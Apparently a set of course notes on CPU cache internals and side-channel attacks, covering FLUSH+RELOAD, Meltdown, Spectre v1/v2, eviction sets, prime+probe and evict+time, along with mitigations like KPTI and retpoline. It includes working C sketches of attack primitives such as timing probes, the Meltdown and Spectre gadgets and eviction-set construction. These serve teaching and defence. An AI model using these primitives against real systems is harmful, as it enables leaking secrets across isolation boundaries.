+++
title = 'CPUs'
+++
# CPUs
## CPU caches
Caches: add fast-path access to memory
- shared across programs, like memory
- great for performance, bad for security

Basic RELOAD attack: you can determine which function is being executed using a timing side channel -- a function that was recently executed will still be in the cache, so it loads faster.

Important properties:
- size: three levels, with L1 smallest and L3 largest (shared across all cores)
- inclusivity: a line present in level X is also present in level X+1

Addressing:
- caches are divided into sets; each address can only go to its own set
- cache line lookup on memory access:
  - if present, hit. if not, miss → fill it in.
  - if the set is full, replace a line
    - replacement policy: most often least recently used
    - reverse engineering the policy (see the simulator sketch after this list):
      - implement a simulator for textbook replacement policies
      - run accesses through the simulator & the real caches
      - compare hits and misses to find the best policy match
- indexing: policy to select the target cache set given a memory address (see the snippet after this list)
- tagging: how to select a cache line within a cache set given a memory address
  - practical implementations use the physical address to identify the cache line in a set (the tag)
  - virtual addresses have problems: e.g. multiple virtual addresses map to a single physical address, or vice versa
- L1: VIPT (virtual index, physical tag), 64 sets, 8 ways. Bits 6-11 decide the set; they are page-offset bits, so shared between the virtual and physical address.
- L2: PIPT, 1024 sets, 4 ways. Bits 6-15 decide the set.
- L3: sliced PIPT, 2048 sets per core, 16 ways. Bits 6-16 decide the set.
  - L3 is partitioned into slices, one per core, accessed via a ring bus
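
A minimal sketch of the policy reverse-engineering idea above: a single-set simulator with pure LRU as the candidate policy. The names and the toy trace are illustrative, not from the lecture.

```c
#include <stdio.h>
#include <string.h>

#define WAYS 8  /* simulate one 8-way set, as in L1 */

/* Simulate one cache set under pure LRU; returns 1 on hit, 0 on miss.
   set[0] is the most recently used line, set[WAYS-1] the eviction victim. */
static int lru_access(unsigned long set[WAYS], int *filled, unsigned long tag) {
    for (int i = 0; i < *filled; i++) {
        if (set[i] == tag) {                      /* hit: move tag to the front */
            memmove(&set[1], &set[0], i * sizeof(set[0]));
            set[0] = tag;
            return 1;
        }
    }
    if (*filled < WAYS) (*filled)++;              /* miss: evict the last entry */
    memmove(&set[1], &set[0], (*filled - 1) * sizeof(set[0]));
    set[0] = tag;
    return 0;
}

int main(void) {
    /* Replay the same trace that was run on the real cache, then compare the
       predicted hit/miss pattern against the measured timings. */
    unsigned long trace[] = {1, 2, 3, 1, 4, 5, 6, 7, 8, 9, 1};
    unsigned long set[WAYS];
    int filled = 0;
    for (size_t i = 0; i < sizeof(trace) / sizeof(trace[0]); i++)
        printf("%lu: %s\n", trace[i],
               lru_access(set, &filled, trace[i]) ? "hit" : "miss");
    return 0;
}
```

The indexing policy itself is just a bit slice of the address once the 64-byte line size is fixed; the set counts follow the per-level numbers above:

```c
/* Set index = address bits [6 .. 6+log2(nsets)-1], for 64-byte cache lines. */
static unsigned set_index(unsigned long paddr, unsigned nsets) {
    return (unsigned)((paddr >> 6) & (nsets - 1));
}
/* set_index(a, 64)   -> L1 set (bits 6-11)
   set_index(a, 1024) -> L2 set (bits 6-15)
   set_index(a, 2048) -> L3 set within a slice (bits 6-16) */
```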

## Timing cache attack
Threat model:
- control of victim: measurement is synchronous, but assumes we can control and time when the victim executes
- no control: fewer assumptions on the attacker, but measurement is asynchronous

Flushing the cache: `clflush` (x86)
- flushes the given memory location from the entire cache hierarchy
- if the attacker doesn't have access to the target memory location, a more sophisticated cache eviction strategy is needed

Observing cache activity: FLUSH+RELOAD
- threat model: victim and attacker share the target code/data
- the attacker can selectively flush a desired shared location from the cache, then reload the target location
- by measuring access times, the attacker can determine whether the victim accessed the memory address (sketch below)
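
A minimal probe sketch, assuming x86 with GCC/Clang intrinsics; the cycle threshold is a placeholder that has to be calibrated per machine:

```c
#include <stdint.h>
#include <x86intrin.h>  /* _mm_clflush, _mm_mfence, __rdtsc */

/* Returns 1 if *target was cached (i.e. the victim touched it since the
   last flush), then flushes it again for the next measurement round. */
static int reload_probe(volatile char *target) {
    uint64_t t0, t1;
    _mm_mfence();
    t0 = __rdtsc();
    (void)*target;                       /* RELOAD: time a single access */
    _mm_mfence();
    t1 = __rdtsc();
    _mm_clflush((const void *)target);   /* FLUSH: reset for the next round */
    return (t1 - t0) < 100;              /* threshold is machine-specific */
}
```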

## Cache attacks on hardware - out-of-order execution
For FLUSH+RELOAD, the victim hardware unit must:
- use the cache
- share memory with attacker-controlled software
- access secrets

Covert channel: both parties are controlled by the attacker.

Rogue Data Cache Load (Meltdown): a FLUSH+RELOAD attack (gadget sketch below)
- a user process accesses a kernel memory location
- the MMU raises an exception and the page fault handler kills the process
- but out-of-order execution (OoOE) already read the secret and filled a cache line
- the reload 'sees' the filled cache line in the timing difference
- avoiding termination: transactional memory (TSX) suppresses exceptions, use that
- reducing noise: the prefetcher in OoOE may fill extra cache lines, but usually doesn't operate across pages; also randomize accesses during the reload stage
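
A hedged sketch of the transient gadget: the 256-entry, page-strided probe array is the standard construction from the Meltdown paper, while the fault handling (or TSX wrapper) is omitted, and `kernel_addr` stands for whatever kernel location the attacker targets.

```c
#define STRIDE 4096  /* one page per byte value, so the prefetcher doesn't interfere */
static unsigned char probe_array[256 * STRIDE];

/* The load of *kernel_addr faults, but out-of-order execution may already
   have run the dependent access, leaving a secret-indexed line in the cache. */
static void meltdown_gadget(const volatile unsigned char *kernel_addr) {
    unsigned char secret = *kernel_addr;    /* architecturally: page fault */
    (void)probe_array[secret * STRIDE];     /* transiently encodes the secret */
}
/* Recover the byte with FLUSH+RELOAD over probe_array[v * STRIDE], v = 0..255:
   the one fast reload reveals the secret value. */
```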

Mitigating Meltdown:
- KPTI: kernel page table isolation. Don't map the kernel into user space, except for the small part needed to switch to kernel space.
  - but very expensive -- better to fix in silicon

## Transient execution attacks
Branch prediction unit: avoids pipeline stalls using speculative execution
- pipeline stalls normally slow down execution
- speculative execution runs some instructions in a branch, which may be rolled back
- the branch target buffer (BTB) stores source addresses and the history of the branch
- speculative execution can have many levels of nesting

After branch prediction:
- correct → retire after the branch instruction
- misprediction → discard the speculatively executed instructions
  - but this does not revert microarchitectural state

Spectre v1: bounds check bypass (gadget sketch below)
- train the branch predictor at a given program location to take a specific branch
- flush the data that controls the branch
- give the target branch an input that makes it go the other way
- you need a gadget that accesses data out of bounds and transmits it, e.g. via a secret-dependent access
- this generalizes Meltdown -- leak from any array offset
- the exception can be suppressed by the branch misprediction
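
The canonical bounds-check-bypass gadget, essentially as in the Spectre paper (the array names follow the paper; the 4096-byte stride encodes the leaked byte one page, and thus one cache set, per value):

```c
#include <stddef.h>

unsigned char array1[16];
unsigned char array2[256 * 4096];
volatile size_t array1_size = 16;

/* Train with in-bounds x, flush array1_size, then call with an out-of-bounds
   x: the bounds check is speculatively bypassed and array1[x] leaks through
   the cache set touched in array2. */
void victim(size_t x) {
    if (x < array1_size)
        (void)array2[array1[x] * 4096];
}
```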

Mitigations for Spectre v1:
- `lfence` stops speculation
  - but: it serializes all loads in the pipeline, so it's costly, up to 2x overhead (though there are optimizations)
  - other instructions also stop speculation, e.g. the instructions to toggle SMAP
- pointer/index masking on array access, so the index can't go out of bounds (sketch after this list)
  - requires manual annotations in the Linux kernel
- low-resolution timers (but attackers can find another timer, or amplify the signal by repeating)
- process-based site isolation (different websites get their own process)
  - assumes process isolation can't be breached
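
A branchless masking sketch in the spirit of the Linux kernel's `array_index_nospec`; this standalone version is an assumption for illustration, not the kernel's exact code (the kernel uses inline asm so the compiler can't reintroduce a branch):

```c
#include <stddef.h>

/* Returns index if index < size, else 0, without a mispredictable branch.
   Assumes arithmetic right shift on signed long (true for GCC/Clang) and
   that both values fit in a signed long. */
static size_t mask_index(size_t index, size_t size) {
    long diff = (long)index - (long)size;           /* negative iff in bounds */
    size_t mask = (size_t)(diff >> (sizeof(long) * 8 - 1)); /* all-ones or 0 */
    return index & mask;
}

/* Usage in the gadget above: array2[array1[mask_index(x, array1_size)] * 4096] */
```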

Spectre v2: branch target injection
- the branch target buffer stores call target predictions (in a separate partition)
- train the branch predictor for a certain path
- on a call in some other context, the trained branch target will be speculatively executed
- the attacker can train the predictor in their own address space
- the victim then mispredicts in its address space and calls into an attacker-controlled address → ROP in speculative execution
- when e.g. the address spaces don't overlap, the attacker can't easily train for a specific virtual address, but can still abuse collisions in the branch target buffer
  - the BTB uses only a few bits of the virtual address to select an entry

Mitigations for Spectre v2:
- Intel initially released a microcode update with instructions to partially flush the BTB
  - OS vendors did not adopt it
- Retpoline: compiler-based, turns indirect calls into returns, which are predicted with the Return Stack Buffer (RSB). Thunk sketch below.
  - goal: redirect speculation to a safe landing pad
  - the `ret` predictor assumes we return to the first instruction after the last call; retpoline places an infinite loop with an `lfence` there
  - problems:
    - indirect calls no longer speculate at all, which is slow
    - on recent microarchitectures, if the RSB is empty, the predictor falls back to the BTB, enabling attacks
      - options: "stuff" the RSB with special entries, or use eIBRS (BTB partitioned across privilege levels & hyperthreads)
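
A sketch of a retpoline thunk for a target held in `%rax` (x86-64, GNU toolchain top-level asm). Compilers emit something of this shape as `__x86_indirect_thunk_rax`; treat this as an illustration, not the exact compiler output.

```c
__asm__(
    ".globl retpoline_thunk_rax\n"
    "retpoline_thunk_rax:\n"
    "  call 1f\n"            /* push the address of the landing pad (0:) */
    "0:\n"                   /* speculation of the later 'ret' lands here... */
    "  pause\n"
    "  lfence\n"             /* ...and spins harmlessly until it is squashed */
    "  jmp 0b\n"
    "1:\n"
    "  mov %rax, (%rsp)\n"   /* overwrite the pushed address with the real target */
    "  ret\n"                /* architecturally jumps to *%rax; RSB predicts 0: */
);
```

The trick: architecturally the `ret` goes to the real target, but the return predictor (RSB) was primed by the `call` to predict the `pause`/`lfence` loop, so speculation never reaches an attacker-controlled BTB entry.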

Other applications of transient/speculative execution:
- ExSpectre: craft a shadow `memcpy` -- one that transfers memory between addresses, but whose data flows are hidden in speculative execution
- BlindSide: a BROP-style attack against the kernel -- buffer-overflow probing without crashes, because the exceptions are suppressed under speculative execution

## Advanced cache attacks
Limitations of FLUSH+RELOAD:
- needs access to the `clflush` instruction (not available in JavaScript or on ARM)
- needs shared memory (not available in e.g. in-kernel Spectre)
- relies on timing (not available in e.g. a sandbox forbidding access to timers)
- causes cache misses on victim execution

Eviction-based attacks:
- goal: no `clflush` and no shared memory
- monitor cache sets instead of cache lines; use 1 eviction set to monitor 1 victim cache set
  - eviction set: given a target cache set, a set of memory addresses that, if all accessed, will evict any other entry in that set

Building an eviction set for L1 (sketch below):
- 1 eviction set for each cache set in L1
- build eviction sets for all cache sets → can monitor all of L1 for victim accesses
- 64 sets: within a 4KB page, we have 64 cache lines, each belonging to a different color (cache set)
- 8 ways: we need 8 4KB pages; accessing the first cache line of each fills the entire cache set of that color (the same offset trick works for the other 63 sets)
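
A minimal sketch for evicting one L1 set on Linux, assuming the geometry above (64 sets, 8 ways, 64-byte lines, 4KB pages); error handling is omitted:

```c
#include <stddef.h>
#include <sys/mman.h>

#define WAYS 8
#define PAGE 4096

/* Evict L1 set `set` (0..63): touch the line at offset set*64 in 8 distinct
   pages; all 8 lines index the same set, filling all of its ways. */
static void evict_l1_set(int set) {
    static char *pages[WAYS];
    if (!pages[0])
        for (int i = 0; i < WAYS; i++)
            pages[i] = mmap(NULL, PAGE, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    for (int i = 0; i < WAYS; i++)
        (void)*(volatile char *)(pages[i] + set * 64);
}
```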

Building an eviction set for L2 (sketch below):
1. Allocate a large pool of pages (large enough to cover all cache sets and ways of the target cache).
2. Pick a page P from the pool.
3. Check that accessing the first cache line of all other pages evicts the first cache line of P.
4. Pick a page Q from the pool. See if the pool without Q still evicts P; if yes, remove Q from the pool.
5. Keep removing pages until the pool has exactly 4 members (one per way). This is an eviction set for P.
6. Try this again with a page that the eviction set for P does not evict, to find another eviction set.
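
A sketch of the reduction loop (steps 4-5), assuming a helper `evicts(pool, n, victim)` is already implemented (walk the first cache line of every page in the pool, then time an access to the victim's first line, as in the FLUSH+RELOAD probe above); all names are hypothetical:

```c
#include <stddef.h>

#define L2_WAYS 4

/* Assumed helper: returns 1 if walking pool[0..n-1] evicts victim's line. */
extern int evicts(char **pool, size_t n, char *victim);

/* Reduce pool[0..n-1] to a minimal eviction set for victim.
   Returns the new pool size (L2_WAYS on success). */
static size_t reduce_to_eviction_set(char **pool, size_t n, char *victim) {
    for (size_t i = 0; i < n && n > L2_WAYS; ) {
        char *q = pool[i];
        pool[i] = pool[n - 1];           /* tentatively drop Q (swap with last) */
        if (evicts(pool, n - 1, victim)) {
            n--;                         /* pool still evicts: drop Q for good */
        } else {
            pool[i] = q;                 /* Q was needed: put it back, try next */
            i++;
        }
    }
    return n;
}
```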

In L1 and L2, cache sets are striped throughout memory.
But because L3 is sliced, the distribution is chaotic.
However, the same eviction set algorithm also works for L3, because it makes no assumptions about physical addresses.

Prime+probe attack:
- the attacker does not control the victim, and code/data are not shared
- steps (probe sketch below):
  1. Prime: build L3 eviction sets for the victim locations. Walk all eviction sets corresponding to the cache sets the attacker wants to monitor. This puts the cache in a known state.
  2. The victim accesses a cache set.
  3. Probe: walk the eviction set again and time it. If slow, the attacker knows the cache set was accessed.
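
A sketch of the probe step, assuming an eviction set is already built and a timing threshold has been calibrated; the prime step is the same walk with the time ignored:

```c
#include <stddef.h>
#include <stdint.h>
#include <x86intrin.h>  /* __rdtsc, _mm_mfence */

/* Walk an eviction set and return the total access time. A slow walk means
   the victim evicted some of our lines, i.e. it touched the monitored set. */
static uint64_t probe_set(volatile char **evset, size_t n) {
    _mm_mfence();
    uint64_t t0 = __rdtsc();
    for (size_t i = 0; i < n; i++)
        (void)*evset[i];
    _mm_mfence();
    uint64_t t1 = __rdtsc();
    return t1 - t0;
}
/* Usage: prime with probe_set(evset, n) (discard the time); let the victim
   run; if the next probe_set(evset, n) exceeds the calibrated threshold,
   the victim accessed the monitored cache set. */
```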

Evict+time:
- the attacker controls the victim; code/data are not shared
- less noisy -- we can control the execution of the victim
- steps (sketch below):
  1. Build L3 eviction sets for the victim locations. Walk all eviction sets corresponding to the cache sets the attacker wants to monitor.
  2. Craft an input to an interface (e.g. RPC) that makes the victim perform a secret-dependent computation.
  3. Time the execution of the victim; if it is slow, the victim accessed the evicted cache set.
- as an attack against the MMU (AnC): trigger page table walks by the MMU and time the accesses
  - the MMU accesses the CPU caches because address translation is frequent and costly
  - AnC needs to trigger victim page table walks, and must at least flush the TLB (evicting TLB entries with eviction sets)
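
A sketch of the evict+time loop, assuming a callable victim entry point and the eviction-set walk from the prime+probe sketch above (both helpers and their names are hypothetical):

```c
#include <stddef.h>
#include <stdint.h>
#include <x86intrin.h>  /* __rdtsc, _mm_mfence */

extern void walk(volatile char **evset, size_t n);  /* assumed: eviction walk */
extern void victim_rpc(int input);                  /* assumed: victim interface */

/* Evict the monitored set, then time the victim itself: a slow run means the
   victim had to re-fetch a line from the evicted cache set. */
static uint64_t evict_and_time(volatile char **evset, size_t n, int input) {
    walk(evset, n);                  /* evict the target cache set */
    _mm_mfence();
    uint64_t t0 = __rdtsc();
    victim_rpc(input);               /* secret-dependent computation */
    _mm_mfence();
    uint64_t t1 = __rdtsc();
    return t1 - t0;                  /* compare against a calibrated baseline */
}
```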